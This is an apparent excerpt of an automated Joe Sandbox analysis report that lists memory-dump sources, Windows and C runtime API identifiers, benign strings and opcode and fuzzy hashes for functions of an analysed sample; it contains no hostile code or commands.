                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                    • API String ID: 3215553584-4202648911
                                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction ID: e97729d13525f606fa96e4258f5a9e47e4e1d8b83d9041e95ec47db90d14db36
                                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction Fuzzy Hash: 2161F37660F24B42FA69BF29E5403FA6AA3E7857B0F5C4535CA0A037E4DB34C9638310
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3544855599-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 375434325b18fcd9a5006d35602e71b5107b281022111b0c7d000fe9cf987591
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: FE615C3660AB468AEB10EF65D4403ED77A2F744BE8F084275EF4917B98DB38D566C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 2901731189757e1daf3d9c1a05424ef0099e64a20c5c7691877b09697229b297
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 66518036208283CAFB64AF1595443B977B2F366BA4F1C4A39DB4987BD5CB38D458C701
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 81eb4067b28fa6764028a4f3b9c2f959109b6e1822d1ce60e4b6655deb49aaba
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 66519D721097838BEB64AF15A4843AD77A2F354BE5F1C4276DA8947B95CB38D473CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: 9b8711b564d2480774510e7dc0b39a9441bf00a66202087ed0e3730fc3d32f24
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 38519E3210A387CAEB64AF1594443B877A2F355BA8F1C4235DA8987BD5CB38D5B3D700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: c35cb26e0b21132ee2998a1d99445de07d117c1679c1f8fef2b51c4f42bdae36
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: 8E51C572719623C7FB14EF15D444BB8B796F360BA4F1A8838DB064B788E7B4C8498704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: d093ce1da2e10dfd717a9a01a741d8e80cbdf835df98257e3b912a5c5330a68f
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: CB51B03270B6038AEB18EF15E444BB93796F354BA8F598934DE4643788FB34D9528704
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,?,00007FF72726324C,?,?,00007FF727263964), ref: 00007FF727267642
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory
                                                                    • String ID: %.*s$%s%c$\
                                                                    • API String ID: 4241100979-1685191245
                                                                    • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                    • Instruction ID: 13b4df71dea0b0b01148c43b74d948b8f430e1085f3089ed1a933ade3abd738e
                                                                    • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                    • Instruction Fuzzy Hash: B231DE21619AC245E621AB15FD107A6A2F4EF45BD0F94823AED6D437C9DF3CD2068F10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: a54769ca1c0aef372d04f8e789942731e875b475b9b2042516fb72d8ed608d2d
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: 4F31AF31619653C7F714EF11E8447A9BBA6F750BA8F0A8838EF5A0B784DB78C945C704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: 03df114943d7301fa6048d1461e3662c70a2cdee109fa995b93ee52092ecf8a5
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: C831C37220A743D6EB18EF15E8447A977A6F340BE8F598434EE5B07784DB38D962C704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ByteCharMultiWide
                                                                    • String ID: Error/warning (ANSI fallback)$Warning
                                                                    • API String ID: 1878133881-2698358428
                                                                    • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                    • Instruction ID: 99eb08ceffcb51ac0182110be5fb27e87b3b5fa3e2e6f1794c8e6a41ff0651c4
                                                                    • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                    • Instruction Fuzzy Hash: B311B272628B8581FB20AB00FA51BA9B3B4FF45B84FD0513ADA4C47654DF3DD606CB20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 2718003287-0
                                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction ID: 6a56e3d6d38aa0333cee6ded37ba7a75a4fcd14287985450feeb7c526d20e8da
                                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction Fuzzy Hash: 44D1E332B1AA8389E751DF69D8403ED3BB2F3547A8F184235DE5997BA9DA34C427C340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 2718003287-0
                                                                    • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                    • Instruction ID: ed34fbfedbc5bac70d58af3bd0c7643cbe9e257fe04a7af1a21b4f82a256f5a2
                                                                    • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                    • Instruction Fuzzy Hash: 02D11432B08A818DE710DF65DA402AC77B1FB46798B908235DE5E9BB99DF38D007CB14
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free
                                                                    • String ID:
                                                                    • API String ID: 3168794593-0
                                                                    • Opcode ID: fccdced75e0e166058a65fb9f01cb5bc762ae8e924348a52df6b038ca287fb4d
                                                                    • Instruction ID: 1e4910203593d57a2ed629625fa9a83ff0a4a7c1c41f5c19a9568d7d1725d1cd
                                                                    • Opcode Fuzzy Hash: fccdced75e0e166058a65fb9f01cb5bc762ae8e924348a52df6b038ca287fb4d
                                                                    • Instruction Fuzzy Hash: B1117036A0EF93CAD714EF62E9042AA77A2F748F91F084035EE4903726DE38C0628740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorLastMode
                                                                    • String ID:
                                                                    • API String ID: 953036326-0
                                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction ID: e89411505171faa4be9b72f0e5b9178855700962fba8596afe9641c645998275
                                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction Fuzzy Hash: B091E77271965389F761AF6598503FE3BA2B704BA8F1C4139DE0A676A5DF38C4A3C700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$DialogInvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 1956198572-0
                                                                    • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                    • Instruction ID: d83835ef2792b73a3411d428ef2cebefbf41698aab357b9f6c7de222110577ff
                                                                    • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                    • Instruction Fuzzy Hash: BC11AC21E0815641F654B759EF4527A92F1EF96780FD4C036DE4947B9ACF3DD4C38920
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction ID: d166fad219c498370d33535c3286f68aedebfd6c565bcfe88b8508f22de0eff6
                                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction Fuzzy Hash: 0B112E32719F0389EF50DF61E8553B933A4F719768F480E31EA6D467A4DB78C1A98380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 7ca02daffe6df188824013a58c94ec0fba667996be9341c2b57e91b0cf284314
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 6B618F33608B468AFB20EF65D4403ED77A2F354B98F08462AEF4917B98DB78D159C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 6c207c118eaa9ea37c9c1115bb77ab4042cae56aa2f9e12482c9c1b8936f05e4
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 9061823360AB868AEB10EF65D4403ED77A2F745B98F084235EF4917B99DB38D1A6C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction ID: 916c6da7a01c18f6df89dbd42da227c110096635ef86769ea7e630ba4f316eea
                                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction Fuzzy Hash: 2951F83220E78381EA34AE29AC583FEA753F385BE0F5C4175DE4903B99CA39C526C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                    • String ID: ?
                                                                    • API String ID: 1286766494-1684325040
                                                                    • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                    • Instruction ID: 0cca318ac89b11bdf6904287a474e0fb0362b8414d5424606921d40e0fa0179e
                                                                    • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                    • Instruction Fuzzy Hash: D5412812A1838243FB20AF259E01779D6F0EB92BA4F904239EE5C46AD5DF3DD4428F20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                    • String ID: .$:
                                                                    • API String ID: 2020911589-4202072812
                                                                    • Opcode ID: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                    • Instruction ID: 319ce5c94a06daf16ee0decacdc1f3a83413e72ad79c44010f193b978c671169
                                                                    • Opcode Fuzzy Hash: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                    • Instruction Fuzzy Hash: D7414D22F0875298FB11EBA19F511FC66F4EF16758F940039DE4D6BA89EF3895438B20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID: U
                                                                    • API String ID: 442123175-4171548499
                                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction ID: 68b1f3fa132f8d71f03269bf9b8fe6fe9b7592141c7719eb5a32f527e2a5efc3
                                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction Fuzzy Hash: CE41933271AB8386DB20AF25E8453EA77A2F7987A4F584031EE4D87794DB3CD452CB40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID: U
                                                                    • API String ID: 442123175-4171548499
                                                                    • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                    • Instruction ID: d3303e5f1ca4b686bd698c87021a5c723964dc4472db9bbb43b77212fa2b04ed
                                                                    • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                    • Instruction Fuzzy Hash: F641B622B1968581EB20DF25E9443A9B7F4FB49B94F944035EE4D87758EF3CD442CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory
                                                                    • String ID: :
                                                                    • API String ID: 1611563598-336475711
                                                                    • Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                    • Instruction ID: d2eb2ee04d62133a97416d2c4aefc3d6ed56b2c4523126d74679c4bd2d751003
                                                                    • Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                    • Instruction Fuzzy Hash: 2F21F223A08681C2EB60AB15DA4427DA3F1FB95B44FD54035CA8C4B284DF7CEA46CF70
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction ID: 5f754d1f3b01070f0d34024edd0cd7e80fd683e0adbcbdc1ef605e751f9f7a45
                                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction Fuzzy Hash: 17111C32219B4282EB619F15E4443AA77E5F788BA4F594270EE8C07768DF38C562C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
